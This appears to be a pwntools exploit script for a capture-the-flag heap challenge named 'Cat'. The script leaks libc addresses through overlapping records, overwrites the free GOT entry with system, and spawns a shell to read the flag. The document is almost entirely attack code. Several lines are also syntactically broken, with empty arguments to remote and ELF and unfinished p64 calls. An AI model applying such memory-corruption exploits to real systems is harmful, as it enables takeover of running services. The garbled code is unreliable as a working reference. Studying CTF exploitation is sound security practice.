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Created April 30, 2018 19:46
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from pwn import *
context.binary = "./Cat"
#p = process("./Cat")
p = remote("", 6000)
def create_record(r, name, kind, age):
r.sendlineafter("> ", "1")
r.sendlineafter("> ", name)
r.sendlineafter("> ", kind)
r.sendlineafter("> ", str(age))
def edit_record(r, id, name, kind, age, modify):
r.sendlineafter("> ", "2")
r.sendlineafter("> ", id)
r.sendlineafter("> ", name)
r.sendlineafter("> ", kind)
r.sendlineafter("> ", str(age))
r.sendlineafter("n> ", modify)
def print_record(r, id):
r.sendlineafter("> ", "3")
r.sendlineafter("> ", id)
r.recvuntil("name: ")
name = r.recvline()
r.recvuntil("kind: ")
kind = r.recvline()
r.recvuntil("old: ")
old = int(r.recvline(), 10)
data = r.recvuntil("----------------")
return name, kind, old
create_record(p, "", "", 0)
edit_record(p, "0", "", "", 0, "n")
buff1 = 0x6020b8 # entry number 3
buff2 = buff1 + 8 # entry number 4
payload = p64(buff1) # this allows us to write there with name
payload += p64(buff2) # this allow us to write there with kind
create_record(p, "", payload, 0)
# this leaks = malloc
# this leaks = puts
edit_record(p, "0", p64(, p64( , 0, "y")
_, _, o = print_record(p, "3")
_, _, o2 = print_record(p, "4")
# o points to malloc, o2 points to puts
# this allows us to figure out which libs is in use
# we download it and use it locally
libc = ELF("./")
libc.address = o - libc.sym.malloc
create_record(p, "", "", 0) # record 4
create_record(p, "", "", 0) # record 5
create_record(p, "", "", 0) # record 6
edit_record(p, "6", "", "", 0, "n")
payload = p64( # we want to overwrite the free got entry with system
payload += p64(buff2) # unused
# "/bin/sh" is uses in free
create_record(p, "/bin/sh", payload, 0)
edit_record(p, "7", p64(libc.sym.system), p64( , 0, "y")
p.sendline("cat /home/pwn/flag")
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